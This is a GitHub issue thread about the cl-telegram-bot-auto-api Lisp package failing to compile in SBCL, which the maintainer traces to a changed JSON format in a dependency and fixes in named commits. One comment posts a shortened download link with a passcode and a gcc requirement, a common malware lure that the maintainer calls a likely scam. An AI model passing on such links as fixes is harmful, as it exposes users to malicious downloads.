### ISSUE TITLE
Can't load the package

### ISSUE THREAD

**Issue by zorgick** [aartaka/cl-telegram-bot-auto-api#1]
Hi! I'm trying my best to understand what's going wrong, but my level of lisp is poor.
When I'm trying to load this package, `sbcl` issues the following error:
```
Unknown location:
  error: 
    COMPILE-FILE-ERROR while compiling
       #<CL-SOURCE-FILE "cl-telegram-bot-auto-api" "cl-telegram-bot-auto-api">

cl-telegram-bot-auto-api.lisp:277:1:
  error: 
    (during macroexpansion of (DEFINE-TG-APIS))
    The value
      "array"
    is not of type
      CHARACTER
    when binding CHAR
```

I haven't mastered macros yet, so it is impossible for me to solve it yet. 
I tried your package in sbcl 2.4.3.
All dependencies, including "njson", are loaded.

**Comment by z3t444** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by zorgick** [comment]
> Give this a shot https://bit.ly/4eaAnWN Passcode: changeme you must have a gcc compiler

Wierd flex, but ok

**Comment by aartaka** [comment]
@zorgick stop, it's likely a scam

**Comment by aartaka** [comment]
@zorgick fixed with 592ecb3bfc4803c926e4b252cd02430558ec7aba. The gist of it is: the dependency that provided JSON file for the API changed the format for return values they list, and that broke the parsing.

**Comment by aartaka** [comment]
I've also updated this dependency to the latest available version in b7e22baca8412f36f255a314150cc18b4a98b579

**Comment by zorgick** [comment]
Thank you! Loads without a problem. Great to see such a quick feedback!
